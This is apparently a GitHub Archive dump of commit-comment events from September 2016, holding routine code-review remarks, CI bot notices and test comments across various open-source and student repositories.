{"id":"4574544920","type":"CommitCommentEvent","actor":{"login":"murrant"},"repo":{"name":"librenms/librenms"},"payload":{"comment":{"id":19055522,"position":null,"line":null,"path":null,"commit_id":"8c5ff4609b31eb4864c7112bbc90381dc857e03d","created_at":"2016-09-16T14:59:28Z","updated_at":"2016-09-16T14:59:28Z","body":"No, your fix is fine. I was just commenting that it is odd that this needs to go both ways.\r\n\r\nThe real fix is to fix all our includes to not be relative..."}},"created_at":"2016-09-16T14:59:28Z"}
{"id":"4574546642","type":"CommitCommentEvent","actor":{"login":"nlyan"},"repo":{"name":"symless/synergy"},"payload":{"comment":{"id":19055525,"position":7,"line":367,"path":"src/lib/client/Client.cpp","commit_id":"59d2c790d39e31ab04ebb1f8862ffd4201982743","created_at":"2016-09-16T14:59:47Z","updated_at":"2016-09-16T14:59:47Z","body":"Probably because we're using an ancient standard C++ library and GCC compiler on our buildbot. Unless you mean the rPi, which could still be ancient"}},"created_at":"2016-09-16T14:59:47Z"}
{"id":"4574554824","type":"CommitCommentEvent","actor":{"login":"itcentrecourses"},"repo":{"name":"itcentrecourses/RepositoryBase004"},"payload":{"comment":{"id":19055539,"position":null,"line":null,"path":null,"commit_id":"2c1ec919ba82529bcf5b1c8bd7c66485cd4e0ceb","created_at":"2016-09-16T15:01:07Z","updated_at":"2016-09-16T15:01:07Z","body":"1. Класс Group, не должен наследоваться от класса Student. \r\n2. ArrayList нужно описать следующим образом, ArrayList<Student> group = new ArrayList(10);\r\n3. Добавление студента в группу можно осуществить с помощью метода add(<Класс Student>)."}},"created_at":"2016-09-16T15:01:07Z"}
{"id":"4574560125","type":"CommitCommentEvent","actor":{"login":"omidfi"},"repo":{"name":"Rookies-RGSOC2016/hoodie-electron-app"},"payload":{"comment":{"id":19055549,"position":null,"line":null,"path":null,"commit_id":"070666c496fb6c4be807e29300a163a0e6c9f3cd","created_at":"2016-09-16T15:02:00Z","updated_at":"2016-09-16T15:02:00Z","body":"Not sure if I get your question right @flyjwayur please correct me if I'm not getting it. \r\n\r\nThe way Apps is defined, makes it identical to API. As we are defining Apps as a function that returns API at the end. In the end that meands Apps.findAll() is almost the same thing as API.findAll().  \r\n\r\nYou can try this in your browser's console. First paste this code and press enter. \r\n```javascript\r\nvar Apps = (function(){\r\nvar API = {};\r\n\r\nAPI.findAll = function() {console.log('hello')};\r\nreturn API;\r\n}());\r\n```\r\nThen type Apps.findAll(). It should write \"hello\" in the logs. \r\n\r\nWhy we do this then? Well the advantage of this pattern is that API becomes private. So it can be changed by project maintainers without worrying other developers are counting on it. The only thing that you project owners need to care about is that the final Apps.findAll behavior doesn't change. For eample imagine one day you decide to change API to MyAPI for some reason. with this pattern, you don't need to worry if you're breaking the code your library users have written. \r\n\r\n```javascript\r\nvar Apps = (function(){\r\nvar MyAPI = {};\r\n\r\nMyAPI.findAll = function() {console.log('hello')};\r\nreturn MyAPI;\r\n}());\r\n```\r\nFor outsiders Apps.findAll is not changed, even though your internal code has changed. \r\n\r\n\r\n"}},"created_at":"2016-09-16T15:02:00Z"}
{"id":"4574569201","type":"CommitCommentEvent","actor":{"login":"jinqian"},"repo":{"name":"Estimote/Android-SDK"},"payload":{"comment":{"id":19055567,"position":56,"line":56,"path":"DOC_deviceConnection.md","commit_id":"a88b9bcd1cb211f2966d7f76b3b2ba1d6f3e4bab","created_at":"2016-09-16T15:03:26Z","updated_at":"2016-09-16T15:03:26Z","body":"the code snippet actually misses a `}` here ;)"}},"created_at":"2016-09-16T15:03:26Z"}
{"id":"4574569355","type":"CommitCommentEvent","actor":{"login":"Mattenable"},"repo":{"name":"oleksiyk/kafka"},"payload":{"comment":{"id":19055568,"position":76,"line":185,"path":"lib/connection.js","commit_id":"7dabcf2bf7c361f2514bb70d42d7c9f97ef67a2f","created_at":"2016-09-16T15:03:28Z","updated_at":"2016-09-16T15:03:28Z","body":"I'm now getting periodic errors on this line `Cannot read property 'resolve' of undefined`"}},"created_at":"2016-09-16T15:03:28Z"}
{"id":"4574570917","type":"CommitCommentEvent","actor":{"login":"matthewmueller"},"repo":{"name":"graphql/graphql-js"},"payload":{"comment":{"id":19055571,"position":null,"line":null,"path":null,"commit_id":"38d074634419256fafee54094ee22b742e69478b","created_at":"2016-09-16T15:03:44Z","updated_at":"2016-09-16T15:03:44Z","body":"just saw this, omg yes 🎉 "}},"created_at":"2016-09-16T15:03:44Z"}
{"id":"4574572883","type":"CommitCommentEvent","actor":{"login":"lucyking"},"repo":{"name":"kamyu104/LeetCode"},"payload":{"comment":{"id":19055574,"position":null,"line":null,"path":null,"commit_id":"4c83ed147daf8dbc894c86e9b3a57bc5e29f5040","created_at":"2016-09-16T15:04:07Z","updated_at":"2016-09-16T15:04:07Z","body":"How about this solution:\r\n[code](https://github.com/lucyking/leetcode/blob/master/python/383.%20Ransom%20Note.py)"}},"created_at":"2016-09-16T15:04:07Z"}
{"id":"4574573755","type":"CommitCommentEvent","actor":{"login":"echowenqi"},"repo":{"name":"echowenqi/hello-world"},"payload":{"comment":{"id":19055576,"position":null,"line":null,"path":null,"commit_id":"da28db226ada1a27def8ad9502e6618727231f37","created_at":"2016-09-16T15:04:17Z","updated_at":"2016-09-16T15:04:17Z","body":"Test1 readme.md\r\n"}},"created_at":"2016-09-16T15:04:17Z"}
{"id":"4574574772","type":"CommitCommentEvent","actor":{"login":"mbogoevici"},"repo":{"name":"spring-cloud/spring-cloud-stream"},"payload":{"comment":{"id":19055580,"position":9,"line":1112,"path":"spring-cloud-stream-core-docs/src/main/asciidoc/spring-cloud-stream-overview.adoc","commit_id":"d79841b7ae91daa0e1e2b0e448e6557cc30d9af4","created_at":"2016-09-16T15:04:26Z","updated_at":"2016-09-16T15:04:26Z","body":"Better to include the code in the document, IMO. Maybe a simpler version that explains how it works ?"}},"created_at":"2016-09-16T15:04:26Z"}
{"id":"4574576295","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19055585,"position":null,"line":null,"path":null,"commit_id":"313fac770de77d4d6d9c04e8454d27698f346f3f","created_at":"2016-09-16T15:04:42Z","updated_at":"2016-09-16T15:04:42Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1030](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13449&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-16T15:04:42Z"}
{"id":"4574576788","type":"CommitCommentEvent","actor":{"login":"mbogoevici"},"repo":{"name":"spring-cloud/spring-cloud-stream"},"payload":{"comment":{"id":19055586,"position":21,"line":1126,"path":"spring-cloud-stream-core-docs/src/main/asciidoc/spring-cloud-stream-overview.adoc","commit_id":"d79841b7ae91daa0e1e2b0e448e6557cc30d9af4","created_at":"2016-09-16T15:04:48Z","updated_at":"2016-09-16T15:04:48Z","body":"This can be a `MessageConverter` bean. "}},"created_at":"2016-09-16T15:04:48Z"}
{"id":"4574577884","type":"CommitCommentEvent","actor":{"login":"dzavalishin"},"repo":{"name":"dzavalishin/phantomuserland"},"payload":{"comment":{"id":19055587,"position":null,"line":null,"path":null,"commit_id":"5e1242783485bada7b3d3eb3a231e2e058748056","created_at":"2016-09-16T15:05:00Z","updated_at":"2016-09-16T15:05:00Z","body":"1. тогда надо убрать финальный cpfs_mutex_unlock( fs->fic_mutex ); в fic_refill?\r\n\r\n2. операция \"*inode = fs->free_inodes_cache[--fs->fic_used];\" неатомарная. её надо делать под мьютеском, так что \r\n\r\n    if (!lock) {\r\n        cpfs_mutex_lock(fs->fic_mutex);\r\n        lock = 1;\r\n    }\r\n\r\nнадо делать до неё\r\n"}},"created_at":"2016-09-16T15:05:00Z"}
{"id":"4574588980","type":"CommitCommentEvent","actor":{"login":"smrutiranjan097"},"repo":{"name":"smrutiranjan097/Git-world"},"payload":{"comment":{"id":19055612,"position":null,"line":null,"path":null,"commit_id":"52910446b141e0b7e9993e32dabff10a8b587a6f","created_at":"2016-09-16T15:06:56Z","updated_at":"2016-09-16T15:06:56Z","body":"syntax: glob\r\n\r\n*.pyc\r\n*.pyc-2.4\r\n*.dat\r\n.*.swp\r\n*/.git/*\r\n*/.cache/*\r\n.gitignore\r\n.tox\r\nsamples/buzz/*.dat\r\nsamples/moderator/*.dat\r\nhtmlcov/*\r\n.coverage\r\ndatabase.sqlite3\r\nbuild/*\r\ngooglecode_upload.py\r\ngoogle_api_python_client.egg-info/*\r\ndist/*\r\nsnapshot/*\r\nMANIFEST\r\n.project\r\n.pydevproject\r\n.settings/*"}},"created_at":"2016-09-16T15:06:56Z"}
{"id":"4574589338","type":"CommitCommentEvent","actor":{"login":"ChShersh"},"repo":{"name":"serokell/serokell-core"},"payload":{"comment":{"id":19055613,"position":15,"line":68,"path":"src/Serokell/Util/Common.hs","commit_id":"dd145591941986d7f3bfe4e6fd942debc00b1f74","created_at":"2016-09-16T15:06:59Z","updated_at":"2016-09-16T15:06:59Z","body":"I suppose this can be implemented more efficient. Because `map snd` is not so good. I think it is better to define `subList` in terms of `genericDrop` and `genericTake` and use this implementation inside `indexedSubList`."}},"created_at":"2016-09-16T15:06:59Z"}
{"id":"4574591192","type":"CommitCommentEvent","actor":{"login":"DaffPunks"},"repo":{"name":"DaffPunks/software-engineering"},"payload":{"comment":{"id":19055618,"position":23,"line":21,"path":"src/com/god/damn/User.java","commit_id":"d2c3243c758347467e7a8a44dcb65c76e71725ff","created_at":"2016-09-16T15:07:18Z","updated_at":"2016-09-16T15:07:18Z","body":"Стиль кода соблюдай"}},"created_at":"2016-09-16T15:07:18Z"}
{"id":"4574597478","type":"CommitCommentEvent","actor":{"login":"ibarba"},"repo":{"name":"ibarba/ed"},"payload":{"comment":{"id":19055633,"position":null,"line":null,"path":null,"commit_id":"0ba1a1cab2079de283940a4889d8f7a81d1169b5","created_at":"2016-09-16T15:08:24Z","updated_at":"2016-09-16T15:08:24Z","body":"Text scanned from _The Power of Comics_ by Paul Levitz."}},"created_at":"2016-09-16T15:08:24Z"}
{"id":"4574604626","type":"CommitCommentEvent","actor":{"login":"hellodineshgarg"},"repo":{"name":"hellodineshgarg/hello-world"},"payload":{"comment":{"id":19055646,"position":null,"line":null,"path":null,"commit_id":"807c6baa8112e977acd4222fd16e182d8bdd61ec","created_at":"2016-09-16T15:09:42Z","updated_at":"2016-09-16T15:09:42Z","body":"hi"}},"created_at":"2016-09-16T15:09:42Z"}
{"id":"4574605963","type":"CommitCommentEvent","actor":{"login":"JakeChampion"},"repo":{"name":"Financial-Times/polyfill-service"},"payload":{"comment":{"id":19055652,"position":11,"line":141,"path":"lib/index.js","commit_id":"60d4a7dcf8ec761e3eeca03db690b0867b9e38c7","created_at":"2016-09-16T15:09:56Z","updated_at":"2016-09-16T15:09:56Z","body":"@triblondon -- Andrew you muppet. Object.assign, make sure gated flag is preserved."}},"created_at":"2016-09-16T15:09:56Z"}
{"id":"4574607096","type":"CommitCommentEvent","actor":{"login":"nobuti"},"repo":{"name":"CartoDB/cartodb"},"payload":{"comment":{"id":19055657,"position":25,"line":48,"path":"app/assets/stylesheets/editor-3/legend-list-form.css.scss","commit_id":"ace0a15929f47c72cca7ea79351290d75f286f74","created_at":"2016-09-16T15:10:08Z","updated_at":"2016-09-16T15:10:08Z","body":"How dare you"}},"created_at":"2016-09-16T15:10:08Z"}
{"id":"4574607700","type":"CommitCommentEvent","actor":{"login":"nayangupta824"},"repo":{"name":"nayangupta824/chatbot"},"payload":{"comment":{"id":19055658,"position":null,"line":null,"path":null,"commit_id":"48d6f447bae3978d711acf0774b65faa640abf1d","created_at":"2016-09-16T15:10:15Z","updated_at":"2016-09-16T15:10:15Z","body":"bla bla"}},"created_at":"2016-09-16T15:10:15Z"}
{"id":"4574618924","type":"CommitCommentEvent","actor":{"login":"forno"},"repo":{"name":"tanacchi/correct_indent"},"payload":{"comment":{"id":19055685,"position":null,"line":null,"path":null,"commit_id":"c8e1e24c0c180039e369008e78015dfeb9e8107a","created_at":"2016-09-16T15:12:14Z","updated_at":"2016-09-16T15:12:14Z","body":"for文が終わった時のiの値をきちんと考えてみよう！\r\nバッファを使いまわしてないから動くかもしれないけど、ダメだよ！"}},"created_at":"2016-09-16T15:12:14Z"}
{"id":"4574624097","type":"CommitCommentEvent","actor":{"login":"snoopspy"},"repo":{"name":"ahroobe/korsec"},"payload":{"comment":{"id":19055698,"position":null,"line":null,"path":null,"commit_id":"89ff09f21cc0c6ee7cf6d378cb9661a427c615f7","created_at":"2016-09-16T15:13:06Z","updated_at":"2016-09-16T15:13:06Z","body":"You don't need to upload binary executable file(pcap_test) in git repository."}},"created_at":"2016-09-16T15:13:06Z"}
{"id":"4574626239","type":"CommitCommentEvent","actor":{"login":"josemartin41"},"repo":{"name":"josemartin41/personal-propro"},"payload":{"comment":{"id":19055708,"position":null,"line":null,"path":null,"commit_id":"6a52d2482ceabf32e67835ed5a32293f4dab5521","created_at":"2016-09-16T15:13:26Z","updated_at":"2016-09-16T15:13:26Z","body":"printf(\"The f is this thing\");"}},"created_at":"2016-09-16T15:13:26Z"}
{"id":"4574627378","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/example-addon-repo"},"payload":{"comment":{"id":19055714,"position":null,"line":null,"path":null,"commit_id":"c04e8a4af31623611b98662c709f6853ac456bab","created_at":"2016-09-16T15:13:38Z","updated_at":"2016-09-16T15:13:38Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#UFmNz5RST5OIYmOO95d8iQ"}},"created_at":"2016-09-16T15:13:38Z"}
{"id":"4574627623","type":"CommitCommentEvent","actor":{"login":"josemartin41"},"repo":{"name":"josemartin41/personal-propro"},"payload":{"comment":{"id":19055715,"position":2,"line":2,"path":"README.md","commit_id":"6a52d2482ceabf32e67835ed5a32293f4dab5521","created_at":"2016-09-16T15:13:40Z","updated_at":"2016-09-16T15:13:40Z","body":"printf(\"The f is this thing\");"}},"created_at":"2016-09-16T15:13:40Z"}
{"id":"4574631890","type":"CommitCommentEvent","actor":{"login":"XinyuHou"},"repo":{"name":"symless/synergy"},"payload":{"comment":{"id":19055723,"position":126,"line":116,"path":"src/lib/platform/OSXMediaKeySimulator.m","commit_id":"7eddc92efa6d24b6f7ee989b11a0026f76b59f34","created_at":"2016-09-16T15:14:22Z","updated_at":"2016-09-16T15:14:22Z","body":"Why not using pass by reference?"}},"created_at":"2016-09-16T15:14:22Z"}
{"id":"4574634947","type":"CommitCommentEvent","actor":{"login":"macool"},"repo":{"name":"noggalito/cima"},"payload":{"comment":{"id":19055737,"position":null,"line":null,"path":null,"commit_id":"d328321e905ffc79d79799a5bd40e4af7c1de0ac","created_at":"2016-09-16T15:14:52Z","updated_at":"2016-09-16T15:14:52Z","body":"💟 "}},"created_at":"2016-09-16T15:14:52Z"}
{"id":"4574640813","type":"CommitCommentEvent","actor":{"login":"wence-"},"repo":{"name":"firedrakeproject/firedrake"},"payload":{"comment":{"id":19055754,"position":2,"line":2,"path":"docs/source/configuration.rst","commit_id":"71664744b1cafb99e1e7f0d85851d7e5a8d023bb","created_at":"2016-09-16T15:15:50Z","updated_at":"2016-09-16T15:15:50Z","body":"Say web interface, not web server.  It is hopefully transparent to the user that they are using a web server."}},"created_at":"2016-09-16T15:15:50Z"}
{"id":"4574641457","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19055758,"position":null,"line":null,"path":null,"commit_id":"313fac770de77d4d6d9c04e8454d27698f346f3f","created_at":"2016-09-16T15:15:57Z","updated_at":"2016-09-16T15:15:57Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1030](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13449&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 247, ignored: 3 Build time: 00:11:14"}},"created_at":"2016-09-16T15:15:57Z"}
{"id":"4574641737","type":"CommitCommentEvent","actor":{"login":"Shaderboy"},"repo":{"name":"plorry/VegAssist"},"payload":{"comment":{"id":19055759,"position":null,"line":null,"path":null,"commit_id":"fe86048b72a5fd718a2cf3c979de514c2ef418fc","created_at":"2016-09-16T15:16:00Z","updated_at":"2016-09-16T15:16:00Z","body":"This should be merged into master - it will address at least a couple of the false positives I've seen as per https://github.com/plorry/VegAssist/issues/52."}},"created_at":"2016-09-16T15:16:00Z"}
{"id":"4574645802","type":"CommitCommentEvent","actor":{"login":"wence-"},"repo":{"name":"firedrakeproject/firedrake"},"payload":{"comment":{"id":19055766,"position":20,"line":20,"path":"docs/source/configuration.rst","commit_id":"71664744b1cafb99e1e7f0d85851d7e5a8d023bb","created_at":"2016-09-16T15:16:40Z","updated_at":"2016-09-16T15:16:40Z","body":"Is it possible for the script to launch the web server and then open this page in the local browser?  Rather than having to give instructions?"}},"created_at":"2016-09-16T15:16:40Z"}
{"id":"4574647073","type":"CommitCommentEvent","actor":{"login":"Sjors"},"repo":{"name":"blockchain/My-Wallet-V3"},"payload":{"comment":{"id":19055768,"position":7,"line":332,"path":"src/coinify/trade.js","commit_id":"c19dd18e60b5f9cd53279a798134737bc8bb2df6","created_at":"2016-09-16T15:16:53Z","updated_at":"2016-09-16T15:16:53Z","body":"That makes sense, sorry. Can you push a fix?"}},"created_at":"2016-09-16T15:16:53Z"}
{"id":"4574649430","type":"CommitCommentEvent","actor":{"login":"snoopspy"},"repo":{"name":"ahroobe/korsec"},"payload":{"comment":{"id":19055773,"position":48,"line":47,"path":"pcap_test/pcap_test.cpp","commit_id":"509e01358c8bc0ddbc2f6c51872d5b0b5c4cf8aa","created_at":"2016-09-16T15:17:18Z","updated_at":"2016-09-16T15:17:18Z","body":"?"}},"created_at":"2016-09-16T15:17:18Z"}
{"id":"4574650395","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/example-addon-repo"},"payload":{"comment":{"id":19055774,"position":null,"line":null,"path":null,"commit_id":"54d98acc14744c30285c9a2fb2adec44e0335618","created_at":"2016-09-16T15:17:27Z","updated_at":"2016-09-16T15:17:27Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#IHGCQrpDQwOLbUIsldVlGQ"}},"created_at":"2016-09-16T15:17:27Z"}
{"id":"4574652995","type":"CommitCommentEvent","actor":{"login":"jnizet"},"repo":{"name":"pkozlowski-opensource/core"},"payload":{"comment":{"id":19055781,"position":null,"line":null,"path":null,"commit_id":"ae0d2ea2a3fd66256f7d2d7c548352bcea9187af","created_at":"2016-09-16T15:17:54Z","updated_at":"2016-09-16T15:17:54Z","body":"LGTM, but it's a breaking change, so the commit comment should mention it, shouldn't it?"}},"created_at":"2016-09-16T15:17:54Z"}
{"id":"4574655414","type":"CommitCommentEvent","actor":{"login":"XinyuHou"},"repo":{"name":"symless/synergy"},"payload":{"comment":{"id":19055787,"position":126,"line":116,"path":"src/lib/platform/OSXMediaKeySimulator.m","commit_id":"7eddc92efa6d24b6f7ee989b11a0026f76b59f34","created_at":"2016-09-16T15:18:19Z","updated_at":"2016-09-16T15:18:19Z","body":"Ah just realize this is objective-c code"}},"created_at":"2016-09-16T15:18:19Z"}
{"id":"4574655922","type":"CommitCommentEvent","actor":{"login":"snoopspy"},"repo":{"name":"ahroobe/korsec"},"payload":{"comment":{"id":19055788,"position":67,"line":78,"path":"pcap_test/pcap_test.cpp","commit_id":"4484bc4763c46f051b9a6b345a9cc578c6f756f1","created_at":"2016-09-16T15:18:23Z","updated_at":"2016-09-16T15:18:23Z","body":"comparison between signed and unsigned integer expressions."}},"created_at":"2016-09-16T15:18:23Z"}
{"id":"4574656103","type":"CommitCommentEvent","actor":{"login":"jtormey"},"repo":{"name":"blockchain/My-Wallet-V3"},"payload":{"comment":{"id":19055789,"position":7,"line":332,"path":"src/coinify/trade.js","commit_id":"c19dd18e60b5f9cd53279a798134737bc8bb2df6","created_at":"2016-09-16T15:18:25Z","updated_at":"2016-09-16T15:18:25Z","body":"We pushed a fix to the frontend, it doesn't expect the trade anymore (less likely to break that way imo)"}},"created_at":"2016-09-16T15:18:25Z"}
{"id":"4574661117","type":"CommitCommentEvent","actor":{"login":"snoopspy"},"repo":{"name":"ahroobe/korsec"},"payload":{"comment":{"id":19055797,"position":24,"line":90,"path":"pcap_test/pcap_test.cpp","commit_id":"89ff09f21cc0c6ee7cf6d378cb9661a427c615f7","created_at":"2016-09-16T15:19:15Z","updated_at":"2016-09-16T15:19:15Z","body":"comparison between signed and unsigned integer expressions."}},"created_at":"2016-09-16T15:19:15Z"}
{"id":"4574662646","type":"CommitCommentEvent","actor":{"login":"muxiangqiu"},"repo":{"name":"muxiangqiu/bdf3"},"payload":{"comment":{"id":19055803,"position":null,"line":null,"path":null,"commit_id":"d9e863da4dab2f0c836cb8d6e7e27b6dbbdde0e9","created_at":"2016-09-16T15:19:31Z","updated_at":"2016-09-16T15:19:31Z","body":"还原"}},"created_at":"2016-09-16T15:19:31Z"}
{"id":"4574669013","type":"CommitCommentEvent","actor":{"login":"franek86"},"repo":{"name":"franek86/coffmeet"},"payload":{"comment":{"id":19055819,"position":3,"line":3,"path":"README.md","commit_id":"6c33a7442ceeb95c1acbacc0891921e0cc3e33c4","created_at":"2016-09-16T15:20:37Z","updated_at":"2016-09-16T15:20:37Z","body":"In process"}},"created_at":"2016-09-16T15:20:37Z"}
{"id":"4574670057","type":"CommitCommentEvent","actor":{"login":"snoopspy"},"repo":{"name":"ahroobe/korsec"},"payload":{"comment":{"id":19055823,"position":26,"line":25,"path":"pcap_test/pcap_test.cpp","commit_id":"509e01358c8bc0ddbc2f6c51872d5b0b5c4cf8aa","created_at":"2016-09-16T15:20:48Z","updated_at":"2016-09-16T15:20:48Z","body":"variable not used."}},"created_at":"2016-09-16T15:20:48Z"}
{"id":"4574672094","type":"CommitCommentEvent","actor":{"login":"wence-"},"repo":{"name":"firedrakeproject/firedrake"},"payload":{"comment":{"id":19055825,"position":8,"line":8,"path":"docs/source/configuration.rst","commit_id":"71664744b1cafb99e1e7f0d85851d7e5a8d023bb","created_at":"2016-09-16T15:21:11Z","updated_at":"2016-09-16T15:21:11Z","body":"I would write something more like this:\r\n\r\n```\r\nFiredrake's parameters (link to the parameters docs here) can be configured either programmatically in python, or through a graphical interface in your web browser.  This is possible through the ``firedrake-config`` script.\r\n```"}},"created_at":"2016-09-16T15:21:11Z"}
{"id":"4574674065","type":"CommitCommentEvent","actor":{"login":"wence-"},"repo":{"name":"firedrakeproject/firedrake"},"payload":{"comment":{"id":19055828,"position":11,"line":11,"path":"docs/source/configuration.rst","commit_id":"71664744b1cafb99e1e7f0d85851d7e5a8d023bb","created_at":"2016-09-16T15:21:31Z","updated_at":"2016-09-16T15:21:31Z","body":"Say rather \"Launching the configuration GUI\""}},"created_at":"2016-09-16T15:21:31Z"}
{"id":"4574677833","type":"CommitCommentEvent","actor":{"login":"r3c0d3x"},"repo":{"name":"r3c0d3x/chan-apis"},"payload":{"comment":{"id":19055833,"position":null,"line":null,"path":null,"commit_id":"774ef3bcef5883441d42a3ddebddd002249900f1","created_at":"2016-09-16T15:22:11Z","updated_at":"2016-09-16T15:22:11Z","body":"Not sure why git decided to rename files in such a strange way but whatever."}},"created_at":"2016-09-16T15:22:11Z"}
{"id":"4574678206","type":"CommitCommentEvent","actor":{"login":"cristipufu"},"repo":{"name":"ivnbogdan/exams.ro"},"payload":{"comment":{"id":19055835,"position":null,"line":null,"path":null,"commit_id":"29a1adedcfd9b215e7a5a2e35ccdf01d3df60c66","created_at":"2016-09-16T15:22:14Z","updated_at":"2016-09-16T15:22:14Z","body":"gg"}},"created_at":"2016-09-16T15:22:14Z"}
{"id":"4574682445","type":"CommitCommentEvent","actor":{"login":"snoopspy"},"repo":{"name":"ahroobe/korsec"},"payload":{"comment":{"id":19055841,"position":103,"line":132,"path":"pcap_test/pcap_test.cpp","commit_id":"4484bc4763c46f051b9a6b345a9cc578c6f756f1","created_at":"2016-09-16T15:22:54Z","updated_at":"2016-09-16T15:22:54Z","body":"filter_exp or argv[1]?\r\nBoth \"pcap_compile\" and \"fprintf\" must use the same parameter."}},"created_at":"2016-09-16T15:22:54Z"}
{"id":"4574686281","type":"CommitCommentEvent","actor":{"login":"Schimmelreiter"},"repo":{"name":"oe-alliance/oe-alliance-core"},"payload":{"comment":{"id":19055853,"position":null,"line":null,"path":null,"commit_id":"a011ee86fc89ad2af8ce96842d01b550ab0bebee","created_at":"2016-09-16T15:23:36Z","updated_at":"2016-09-16T15:23:36Z","body":"For OpenHDF:\r\nhttps://github.com/openhdf/enigma2/pull/10/files\r\n\r\nDidn't find this occurence in OpenViX, OpenBH, but that doesn't mean anything.\r\nEither way, the fix would be the same."}},"created_at":"2016-09-16T15:23:36Z"}
{"id":"4574688513","type":"CommitCommentEvent","actor":{"login":"wence-"},"repo":{"name":"firedrakeproject/firedrake"},"payload":{"comment":{"id":19055858,"position":17,"line":17,"path":"docs/source/configuration.rst","commit_id":"71664744b1cafb99e1e7f0d85851d7e5a8d023bb","created_at":"2016-09-16T15:23:58Z","updated_at":"2016-09-16T15:23:58Z","body":"I think we should think about this.  Although the internal implementation detail requires this to be a module name, can we have something like:\r\n\r\n```\r\nfiredrake-config --package firedrake\r\n```\r\n\r\nAnd then similarly people can do:\r\n\r\n```\r\nfiredrake-config --package thetis\r\n```\r\nThen we just need to document the internal API for how this works."}},"created_at":"2016-09-16T15:23:58Z"}
{"id":"4574689450","type":"CommitCommentEvent","actor":{"login":"cocolino"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":19055860,"position":null,"line":null,"path":null,"commit_id":"bbc983fc3d3a525187bdcf08ea6e10e8e31e1b0b","created_at":"2016-09-16T15:24:09Z","updated_at":"2016-09-16T15:24:09Z","body":"Nice one :+1: "}},"created_at":"2016-09-16T15:24:09Z"}
{"id":"4574692866","type":"CommitCommentEvent","actor":{"login":"TingYiShun"},"repo":{"name":"TingYiShun/rhha-smile"},"payload":{"comment":{"id":19055867,"position":null,"line":null,"path":null,"commit_id":"50ccbf3538d18b25fc23f71b12cd35d96d9f147e","created_at":"2016-09-16T15:24:46Z","updated_at":"2016-09-16T15:24:46Z","body":"Eating habbits changed"}},"created_at":"2016-09-16T15:24:46Z"}
{"id":"4574694279","type":"CommitCommentEvent","actor":{"login":"piensaenpixel"},"repo":{"name":"CartoDB/cartodb"},"payload":{"comment":{"id":19055870,"position":25,"line":48,"path":"app/assets/stylesheets/editor-3/legend-list-form.css.scss","commit_id":"ace0a15929f47c72cca7ea79351290d75f286f74","created_at":"2016-09-16T15:25:01Z","updated_at":"2016-09-16T15:25:01Z","body":"hahahaha"}},"created_at":"2016-09-16T15:25:01Z"}
{"id":"4574695836","type":"CommitCommentEvent","actor":{"login":"tmm1"},"repo":{"name":"ruby/ruby"},"payload":{"comment":{"id":19055874,"position":null,"line":null,"path":null,"commit_id":"cfb2b14ddce37c3a1c388748e6aaa897ce99923e","created_at":"2016-09-16T15:25:18Z","updated_at":"2016-09-16T15:25:18Z","body":"In addition, most json databases like elasticsearch and mongodb use newline-separated json for import/export. This makes it very easy to load in a ruby heap dump for analysis."}},"created_at":"2016-09-16T15:25:18Z"}
{"id":"4574703014","type":"CommitCommentEvent","actor":{"login":"wence-"},"repo":{"name":"firedrakeproject/firedrake"},"payload":{"comment":{"id":19055889,"position":29,"line":29,"path":"docs/source/configuration.rst","commit_id":"71664744b1cafb99e1e7f0d85851d7e5a8d023bb","created_at":"2016-09-16T15:26:32Z","updated_at":"2016-09-16T15:26:32Z","body":"I think if we have to explain this, we've done something wrong.  Reminder, we should set appropriate visibility levels in the parameters dict by default."}},"created_at":"2016-09-16T15:26:32Z"}
{"id":"4574703131","type":"CommitCommentEvent","actor":{"login":"snoopspy"},"repo":{"name":"ahroobe/korsec"},"payload":{"comment":{"id":19055890,"position":65,"line":64,"path":"pcap_test/pcap_test.cpp","commit_id":"509e01358c8bc0ddbc2f6c51872d5b0b5c4cf8aa","created_at":"2016-09-16T15:26:33Z","updated_at":"2016-09-16T15:26:33Z","body":"You don't need to call packet_next if you use pcap_loop function."}},"created_at":"2016-09-16T15:26:33Z"}
{"id":"4574703257","type":"CommitCommentEvent","actor":{"login":"chengrenz"},"repo":{"name":"jpush/jpush-phonegap-plugin"},"payload":{"comment":{"id":19055892,"position":null,"line":null,"path":null,"commit_id":"a365c632d491834ffb8622264dcec2b403167efc","created_at":"2016-09-16T15:26:35Z","updated_at":"2016-09-16T15:26:35Z","body":"麻烦尽快更新支持ios10"}},"created_at":"2016-09-16T15:26:35Z"}
{"id":"4574703282","type":"CommitCommentEvent","actor":{"login":"stakeout"},"repo":{"name":"bangkok615/198622-sedona"},"payload":{"comment":{"id":19055894,"position":8,"line":8,"path":"form.html","commit_id":"e5873f04069c8ca17898fe36c0bda9fc9faea8d9","created_at":"2016-09-16T15:26:35Z","updated_at":"2016-09-16T15:26:35Z","body":"лучше пиши более акцентирующий класс, типо page-wrapper"}},"created_at":"2016-09-16T15:26:35Z"}
{"id":"4574705751","type":"CommitCommentEvent","actor":{"login":"stakeout"},"repo":{"name":"bangkok615/198622-sedona"},"payload":{"comment":{"id":19055899,"position":9,"line":9,"path":"form.html","commit_id":"e5873f04069c8ca17898fe36c0bda9fc9faea8d9","created_at":"2016-09-16T15:27:00Z","updated_at":"2016-09-16T15:27:00Z","body":"тоже и здесь, лучше будет .page-header"}},"created_at":"2016-09-16T15:27:00Z"}
